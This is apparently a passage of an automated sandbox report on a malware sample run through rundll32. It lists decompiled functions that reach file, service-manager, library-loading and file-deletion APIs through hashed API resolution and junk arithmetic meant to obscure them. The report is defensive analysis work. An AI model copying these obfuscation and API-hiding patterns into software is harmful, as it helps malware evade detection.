                                          • Source File: 0000000E.00000002.2104289141.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 0000000E.00000002.2104276955.0000000000210000.00000004.00000001.sdmp Download File
                                          • Associated: 0000000E.00000002.2104325330.000000000022C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID:
                                          • API String ID: 963392458-0
                                          • Opcode ID: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
                                          • Instruction ID: 8af8b585893f82bc15f7c07b0853e93990054816491876dc31458a1a35a57156
                                          • Opcode Fuzzy Hash: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
                                          • Instruction Fuzzy Hash: 8111B372911148BBDF199FD6DC0ACDF7F7AEF89750F104148FA1556120D2768A60EBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0021B566, Relevance: 1.6, APIs: 1, Instructions: 55fileCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 31%
                                          			E0021B566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
				unsigned int _v8;
				signed int _v12;
				void* _t32;
				void* _t38;
				long _t47;

				_push(__ecx);
				_push(__ecx);
				_push(_a48);
				_t47 = __edx;
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0);
				E0021602B(_t32);
				_v8 = 0xfd14;
				_v8 = _v8 >> 4;
				_v8 = _v8 * 0x7a;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0x00002bef;
				_v12 = 0x4f26;
				_v12 = _v12 | 0xe7e97f76;
				_v12 = _v12 ^ 0xe7e94dbb;
				E002207A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
				return _t38;
			}








                                          0x0021b569
                                          0x0021b56a
                                          0x0021b56d
                                          0x0021b572
                                          0x0021b574
                                          0x0021b577
                                          0x0021b57a
                                          0x0021b57d
                                          0x0021b580
                                          0x0021b583
                                          0x0021b586
                                          0x0021b587
                                          0x0021b58a
                                          0x0021b58d
                                          0x0021b590
                                          0x0021b593
                                          0x0021b594
                                          0x0021b595
                                          0x0021b59a
                                          0x0021b5a4
                                          0x0021b5b8
                                          0x0021b5c0
                                          0x0021b5c4
                                          0x0021b5cb
                                          0x0021b5d2
                                          0x0021b5d9
                                          0x0021b5e6
                                          0x0021b5fd
                                          0x0021b604

                                          APIs
                                          • CreateFileW.KERNELBASE(00220668,?,?,00000000,?,?,00000000,?,?,?,047BBE06,00220668,?,?,?,?), ref: 0021B5FD
                                          Memory Dump Source
                                          • Source File: 0000000E.00000002.2104289141.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 0000000E.00000002.2104276955.0000000000210000.00000004.00000001.sdmp Download File
                                          • Associated: 0000000E.00000002.2104325330.000000000022C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
                                          • Instruction ID: 8c5b0151ff509629f37df0858bbc5671548eea907959aa7da7d1092e1be52d2d
                                          • Opcode Fuzzy Hash: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
                                          • Instruction Fuzzy Hash: 4211C372801248BBDF16DF95DD06CEE7FBAFF89314F148198FA1862120D3729A60EB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0022981E, Relevance: 1.5, APIs: 1, Instructions: 43memoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 54%
                                          			E0022981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				void* _t22;
				void* _t28;
				void* _t34;
				long _t37;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_t34 = __edx;
				_t37 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0021602B(_t22);
				_v12 = 0xe68;
				_v12 = _v12 * 0x39;
				_v12 = _v12 ^ 0xd1b1d871;
				_v12 = _v12 ^ 0xd1b2fb7e;
				_v8 = 0x629e;
				_v8 = _v8 + 0xfffff5da;
				_v8 = _v8 | 0xbef7b77b;
				_v8 = _v8 ^ 0xbef79fc3;
				E002207A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
				return _t28;
			}









                                          0x00229821
                                          0x00229822
                                          0x00229825
                                          0x00229828
                                          0x0022982a
                                          0x0022982c
                                          0x0022982f
                                          0x00229832
                                          0x00229835
                                          0x00229836
                                          0x00229837
                                          0x0022983c
                                          0x00229855
                                          0x00229858
                                          0x0022985f
                                          0x00229866
                                          0x0022986d
                                          0x00229874
                                          0x0022987b
                                          0x0022988e
                                          0x0022989b
                                          0x002298a2

                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00000001,?,?,?,002187F2,0000CAAE,0000510C,AD82F196), ref: 0022989B
                                          Memory Dump Source
                                          • Source File: 0000000E.00000002.2104289141.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 0000000E.00000002.2104276955.0000000000210000.00000004.00000001.sdmp Download File
                                          • Associated: 0000000E.00000002.2104325330.000000000022C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
                                          • Instruction ID: 136ff4b73406eac4840e75f5a7c5c464a2f8124889a7d21b5cd232603915ad96
                                          • Opcode Fuzzy Hash: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
                                          • Instruction Fuzzy Hash: C2014876801208BBDB04EFD5D8468DFBFB9EF85750F108199F918A6220E6715A619BA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00227BF4, Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 62%
                                          			E00227BF4(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				void* _t24;
				int _t31;
				signed int _t33;
				struct _SHFILEOPSTRUCTW* _t40;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_t40 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0021602B(_t24);
				_v8 = 0xa117;
				_t33 = 0x76;
				_v8 = _v8 / _t33;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x210fe703;
				_v8 = _v8 ^ 0x210fdcea;
				_v12 = 0xf1e9;
				_v12 = _v12 << 9;
				_v12 = _v12 ^ 0x01e3a445;
				E002207A9(0x6b98377a, 0xd39e34db, _t33, _t33, 0x219);
				_t31 = SHFileOperationW(_t40); // executed
				return _t31;
			}









                                          0x00227bf7
                                          0x00227bf8
                                          0x00227bfa
                                          0x00227bfd
                                          0x00227bff
                                          0x00227c02
                                          0x00227c06
                                          0x00227c07
                                          0x00227c0f
                                          0x00227c1d
                                          0x00227c25
                                          0x00227c2d
                                          0x00227c31
                                          0x00227c38
                                          0x00227c3f
                                          0x00227c46
                                          0x00227c4a
                                          0x00227c5e
                                          0x00227c67
                                          0x00227c6d

                                          APIs
                                          • SHFileOperationW.SHELL32(68CF93E9,?,?,?,?,?,?), ref: 00227C67
                                          Memory Dump Source
                                          • Source File: 0000000E.00000002.2104289141.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 0000000E.00000002.2104276955.0000000000210000.00000004.00000001.sdmp Download File
                                          • Associated: 0000000E.00000002.2104325330.000000000022C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: FileOperation
                                          • String ID:
                                          • API String ID: 3080627654-0
                                          • Opcode ID: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
                                          • Instruction ID: 4506c20672cf2cf3caec14a6ca0a9d6c1bf7f964dc28c20fa5fa43f13956cead
                                          • Opcode Fuzzy Hash: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
                                          • Instruction Fuzzy Hash: 7E014FB190120CFFEB09DF94D84A8DEBBB5EF44314F108198F40567240E7B15F609B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0021F65F, Relevance: 1.5, APIs: 1, Instructions: 40serviceCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 52%
                                          			E0021F65F(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16, intOrPtr _a20) {
				unsigned int _v8;
				signed int _v12;
				void* _t24;
				void* _t29;
				int _t35;

				_push(__ecx);
				_push(__ecx);
				_push(_a20);
				_t35 = __ecx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0021602B(_t24);
				_v12 = 0xd5a7;
				_v12 = _v12 ^ 0x994cba9d;
				_v12 = _v12 ^ 0x994c19d3;
				_v8 = 0xac88;
				_v8 = _v8 << 3;
				_v8 = _v8 >> 8;
				_v8 = _v8 + 0xebed;
				_v8 = _v8 ^ 0x0000ab82;
				E002207A9(0x1b506617, 0x2c3ac9a2, __ecx, __ecx, 0x18c);
				_t29 = OpenServiceW(_a16, _a12, _t35); // executed
				return _t29;
			}








                                          0x0021f662
                                          0x0021f663
                                          0x0021f665
                                          0x0021f668
                                          0x0021f66a
                                          0x0021f66d
                                          0x0021f670
                                          0x0021f673
                                          0x0021f677
                                          0x0021f678
                                          0x0021f67d
                                          0x0021f687
                                          0x0021f693
                                          0x0021f69a
                                          0x0021f6a1
                                          0x0021f6a5
                                          0x0021f6a9
                                          0x0021f6b0
                                          0x0021f6c9
                                          0x0021f6d8
                                          0x0021f6de

                                          APIs
                                          • OpenServiceW.ADVAPI32(BB1E804F,0000AB81,A536EF12), ref: 0021F6D8
                                          Memory Dump Source
                                          • Source File: 0000000E.00000002.2104289141.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 0000000E.00000002.2104276955.0000000000210000.00000004.00000001.sdmp Download File
                                          • Associated: 0000000E.00000002.2104325330.000000000022C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: OpenService
                                          • String ID:
                                          • API String ID: 3098006287-0
                                          • Opcode ID: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
                                          • Instruction ID: 106e2d8713a64ed87b02e2ca2f7615aa113f59112c714e2c671415f888782640
                                          • Opcode Fuzzy Hash: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
                                          • Instruction Fuzzy Hash: 9B01E5B6901208BBEF059F94DC4A8DF7F75EB05324F148188F90462250D6B25E61DBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0021B6DD, Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 58%
                                          			E0021B6DD(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				void* _t23;
				intOrPtr* _t27;
				void* _t28;

				E0021602B(_t23);
				_v12 = 0x9431;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x0000160f;
				_v8 = 0xc972;
				_v8 = _v8 ^ 0x829e0126;
				_v8 = _v8 + 0x4512;
				_v8 = _v8 + 0xffff18f9;
				_v8 = _v8 ^ 0x829e24c1;
				_t27 = E002207A9(0x6460e96, 0x9164b7cc, __ecx, __ecx, 0x114);
				_t28 =  *_t27(_a8, 0, _a16, 0x28, 0, __edx, 0x28, _a8, _a12, _a16, _a20, __ecx, __ecx); // executed
				return _t28;
			}








                                          0x0021b6f3
                                          0x0021b6f8
                                          0x0021b702
                                          0x0021b70b
                                          0x0021b712
                                          0x0021b719
                                          0x0021b720
                                          0x0021b727
                                          0x0021b72e
                                          0x0021b747
                                          0x0021b759
                                          0x0021b75e

                                          APIs
                                          • SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 0021B759
                                          Memory Dump Source
                                          • Source File: 0000000E.00000002.2104289141.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 0000000E.00000002.2104276955.0000000000210000.00000004.00000001.sdmp Download File
                                          • Associated: 0000000E.00000002.2104325330.000000000022C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: FileHandleInformation
                                          • String ID:
                                          • API String ID: 3935143524-0
                                          • Opcode ID: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
                                          • Instruction ID: 82f69c0fac6d70267d21593f0c3ff8349d879125f3defbce7c14a7de5816fdb4
                                          • Opcode Fuzzy Hash: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
                                          • Instruction Fuzzy Hash: 150178B2940308FBEB45DF90DD06A9E7BB5EB18704F108188FA09261A0D3B25A20AB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0022AA3C, Relevance: 1.5, APIs: 1, Instructions: 34fileCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 58%
                                          			E0022AA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				signed int _v8;
				unsigned int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0021602B(_t21);
				_v12 = 0xcc49;
				_v12 = _v12 << 6;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0x000ca988;
				_v8 = 0x5d85;
				_v8 = _v8 | 0xb9d19a55;
				_v8 = _v8 * 0xd;
				_v8 = _v8 ^ 0x6fa87272;
				E002207A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
				_t27 = DeleteFileW(_a12); // executed
				return _t27;
			}







                                          0x0022aa3f
                                          0x0022aa40
                                          0x0022aa41
                                          0x0022aa44
                                          0x0022aa47
                                          0x0022aa4b
                                          0x0022aa4c
                                          0x0022aa51
                                          0x0022aa5b
                                          0x0022aa64
                                          0x0022aa68
                                          0x0022aa6f
                                          0x0022aa76
                                          0x0022aa8d
                                          0x0022aa90
                                          0x0022aa9d
                                          0x0022aaa8
                                          0x0022aaad

                                          APIs
                                          • DeleteFileW.KERNELBASE(?,?,?,?,A6E18774,?,?), ref: 0022AAA8
                                          Memory Dump Source
                                          • Source File: 0000000E.00000002.2104289141.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 0000000E.00000002.2104276955.0000000000210000.00000004.00000001.sdmp Download File
                                          • Associated: 0000000E.00000002.2104325330.000000000022C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: DeleteFile
                                          • String ID:
                                          • API String ID: 4033686569-0
                                          • Opcode ID: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
                                          • Instruction ID: bda999c00b52578895d364b87efee0fbb129f381efd7f11970989b5c23b94233
                                          • Opcode Fuzzy Hash: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
                                          • Instruction Fuzzy Hash: 92F069B191020CFFDF08DF94DD4A89EBFB4EB44304F108088F805A6250D3B69B649B50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00215FB2, Relevance: 1.5, APIs: 1, Instructions: 33serviceCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 70%
                                          			E00215FB2(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E0021602B(_t21);
				_v12 = 0x33d;
				_v12 = _v12 + 0xc3dc;
				_v12 = _v12 | 0x39ccfb02;
				_v12 = _v12 ^ 0x39ccf342;
				_v8 = 0xe8d9;
				_v8 = _v8 * 0x16;
				_v8 = _v8 | 0x4145347f;
				_v8 = _v8 ^ 0x9035ef96;
				_v8 = _v8 ^ 0xd1609914;
				E002207A9(0x6b3db31e, 0x2c3ac9a2, __ecx, __ecx, 0x1d5);
				_t27 = CloseServiceHandle(_a4); // executed
				return _t27;
			}







                                          0x00215fb5
                                          0x00215fb6
                                          0x00215fb7
                                          0x00215fbb
                                          0x00215fbc
                                          0x00215fc1
                                          0x00215fcb
                                          0x00215fd7
                                          0x00215fde
                                          0x00215fe5
                                          0x00215ffc
                                          0x00215fff
                                          0x00216006
                                          0x0021600d
                                          0x0021601a
                                          0x00216025
                                          0x0021602a

                                          APIs
                                          • CloseServiceHandle.ADVAPI32(39CCF342), ref: 00216025
                                          Memory Dump Source
                                          • Source File: 0000000E.00000002.2104289141.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 0000000E.00000002.2104276955.0000000000210000.00000004.00000001.sdmp Download File
                                          • Associated: 0000000E.00000002.2104325330.000000000022C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: CloseHandleService
                                          • String ID:
                                          • API String ID: 1725840886-0
                                          • Opcode ID: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
                                          • Instruction ID: 5d995ea7630725837acdc99d8627ad3ff9cdb75dcbb2e3a096d8fe34c137cd10
                                          • Opcode Fuzzy Hash: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
                                          • Instruction Fuzzy Hash: C9F04FB0C11208FFDB08DFA0E94689EBFB8EB40300F20819CE409A7260E7715F559F54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Analysis Process: rundll32.exe PID: 2952 Parent PID: 3004 rundll32.exeCOMMON

                                          Executed Functions

                                          Function 00212959, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 62%
                                          			E00212959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
				unsigned int _v8;
				signed int _v12;
				void* _t30;
				void* _t39;
				signed int _t41;
				signed int _t42;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(0);
				E0021602B(_t30);
				_v12 = 0x5e3c;
				_t41 = 0x63;
				_v12 = _v12 / _t41;
				_t42 = 0x2f;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x000064be;
				_v8 = 0x74da;
				_v8 = _v8 | 0xfefeeaea;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x000fb531;
				E002207A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
				_t39 = OpenSCManagerW(0, 0, _a16); // executed
				return _t39;
			}









                                          0x0021295f
                                          0x00212964
                                          0x00212967
                                          0x0021296a
                                          0x0021296d
                                          0x0021296e
                                          0x0021296f
                                          0x00212977
                                          0x00212985
                                          0x0021298a
                                          0x00212992
                                          0x0021299a
                                          0x002129a2
                                          0x002129a9
                                          0x002129b0
                                          0x002129b7
                                          0x002129bb
                                          0x002129cf
                                          0x002129dc
                                          0x002129e2

                                          APIs
                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 002129DC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.2105601376.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 0000000F.00000002.2105574473.0000000000210000.00000004.00000001.sdmp Download File
                                          • Associated: 0000000F.00000002.2105630898.000000000022C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: ManagerOpen
                                          • String ID: <^
                                          • API String ID: 1889721586-3203995635
                                          • Opcode ID: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                          • Instruction ID: d406d96ca1e4ca2a5ce053f8c48229baa50acf6c46116ac46087fabbe791cae1
                                          • Opcode Fuzzy Hash: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                          • Instruction Fuzzy Hash: E3016D72A00108BFEB14DF95DC4A8DFBFB6EF48310F108088F508A6250D7B65F619B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0021C6C7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 58%
                                          			E0021C6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t29;
				intOrPtr* _t33;
				void* _t34;

				E0021602B(_t29);
				_v28 = 0x4fe02f;
				_v24 = 0x232390;
				_v20 = 0xf8460;
				_v16 = 0;
				_v12 = 0xf625;
				_v12 = _v12 >> 6;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 + 0xffffcc6f;
				_v12 = _v12 ^ 0xffffa5b6;
				_v8 = 0xe5cd;
				_v8 = _v8 + 0xffffae4d;
				_v8 = _v8 | 0xf8bbefe7;
				_v8 = _v8 ^ 0xf8bbcc9a;
				_t33 = E002207A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
				return _t34;
			}












                                          0x0021c6e1
                                          0x0021c6e6
                                          0x0021c6f0
                                          0x0021c6fc
                                          0x0021c703
                                          0x0021c706
                                          0x0021c70d
                                          0x0021c711
                                          0x0021c715
                                          0x0021c71c
                                          0x0021c723
                                          0x0021c72a
                                          0x0021c731
                                          0x0021c738
                                          0x0021c751
                                          0x0021c762
                                          0x0021c768

                                          APIs
                                          • SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 0021C762
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.2105601376.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 0000000F.00000002.2105574473.0000000000210000.00000004.00000001.sdmp Download File
                                          • Associated: 0000000F.00000002.2105630898.000000000022C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: FolderPath
                                          • String ID: /O
                                          • API String ID: 1514166925-1923427199
                                          • Opcode ID: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
                                          • Instruction ID: 368e049acd3fbf82153a8d53a9143e92210354e00549e693d66a1729611a1674
                                          • Opcode Fuzzy Hash: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
                                          • Instruction Fuzzy Hash: AD1133B290122DBBCB25DF95DC498EFBFB8EF04714F108188F90962210D3714B659BE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00211000, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42libraryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 82%
                                          			E00211000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t33;
				struct HINSTANCE__* _t40;
				signed int _t42;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E0021602B(_t33);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x1b2eda;
				_v20 = 0x33a3b7;
				_v12 = 0x98c;
				_v12 = _v12 + 0xb426;
				_v12 = _v12 + 0x5beb;
				_t42 = 0x63;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x00000fce;
				_v8 = 0x120e;
				_v8 = _v8 + 0xfffffcb8;
				_v8 = _v8 + 0xffffefaa;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x07ff9a02;
				E002207A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
				_t40 = LoadLibraryW(_a12); // executed
				return _t40;
			}











                                          0x00211006
                                          0x00211009
                                          0x0021100c
                                          0x00211011
                                          0x00211016
                                          0x0021101d
                                          0x00211026
                                          0x0021102d
                                          0x00211034
                                          0x0021103b
                                          0x00211047
                                          0x0021104f
                                          0x00211057
                                          0x0021105e
                                          0x00211065
                                          0x0021106c
                                          0x00211073
                                          0x00211077
                                          0x0021108b
                                          0x00211096
                                          0x0021109b

                                          APIs
                                          • LoadLibraryW.KERNEL32(0033A3B7), ref: 00211096
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.2105601376.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 0000000F.00000002.2105574473.0000000000210000.00000004.00000001.sdmp Download File
                                          • Associated: 0000000F.00000002.2105630898.000000000022C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID: [
                                          • API String ID: 1029625771-3431493590
                                          • Opcode ID: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
                                          • Instruction ID: 542211732888673dd6bd4a999da95d67d8dd94142be1235f0600662faada698f
                                          • Opcode Fuzzy Hash: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
                                          • Instruction Fuzzy Hash: 5B015BB6D01708BBDF04DF94C94A5DEBBB1AB54318F108188E41466291D3B19B649B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00214859, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00214859() {
				signed int _v8;
				signed int _v12;
				void* _t22;

				_v12 = 0xafe2;
				_v12 = _v12 * 0x42;
				_v12 = _v12 + 0xffffdd89;
				_v12 = _v12 ^ 0x002d198d;
				_v8 = 0x5b09;
				_v8 = _v8 | 0xa1ea9544;
				_v8 = _v8 * 0x12;
				_v8 = _v8 ^ 0x6283d9c1;
				E002207A9(0xc44181ea, 0x9164b7cc, _t22, _t22, 0x1a5);
				ExitProcess(0);
			}






                                          0x0021485e
                                          0x0021487a
                                          0x0021487d
                                          0x00214884
                                          0x0021488b
                                          0x00214892
                                          0x0021489d
                                          0x002148a0
                                          0x002148ad
                                          0x002148b7

                                          APIs
                                          • ExitProcess.KERNELBASE(00000000), ref: 002148B7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.2105601376.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 0000000F.00000002.2105574473.0000000000210000.00000004.00000001.sdmp Download File
                                          • Associated: 0000000F.00000002.2105630898.000000000022C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: ExitProcess
                                          • String ID: [
                                          • API String ID: 621844428-1822564810
                                          • Opcode ID: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
                                          • Instruction ID: f34ee4eb2b485e945288599d497fbdc208df6c84720c6139dbff6cf129befafa
                                          • Opcode Fuzzy Hash: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
                                          • Instruction Fuzzy Hash: 8CF017B0A15209FBDB04CFE8DA9699EBFB9EB40301F20818CE444B7290E3B15F509B50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00224F7D, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 32COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 66%
                                          			E00224F7D(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t17;
				int _t24;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E0021602B(_t17);
				_v12 = 0xddd8;
				_v12 = _v12 * 0x48;
				_v12 = _v12 ^ 0x003e66d8;
				_v8 = 0xcb35;
				_v8 = _v8 ^ 0x7b88573c;
				_v8 = _v8 * 0x59;
				_v8 = _v8 ^ 0xf27e4a21;
				E002207A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
				_t24 = CloseHandle(_a4); // executed
				return _t24;
			}







                                          0x00224f80
                                          0x00224f81
                                          0x00224f82
                                          0x00224f86
                                          0x00224f87
                                          0x00224f8c
                                          0x00224fa5
                                          0x00224fa8
                                          0x00224faf
                                          0x00224fb6
                                          0x00224fc7
                                          0x00224fca
                                          0x00224fd7
                                          0x00224fe2
                                          0x00224fe7

                                          APIs
                                          • CloseHandle.KERNELBASE(003E66D8), ref: 00224FE2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.2105601376.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 0000000F.00000002.2105574473.0000000000210000.00000004.00000001.sdmp Download File
                                          • Associated: 0000000F.00000002.2105630898.000000000022C000.00000004.00000001.sdmp Download File
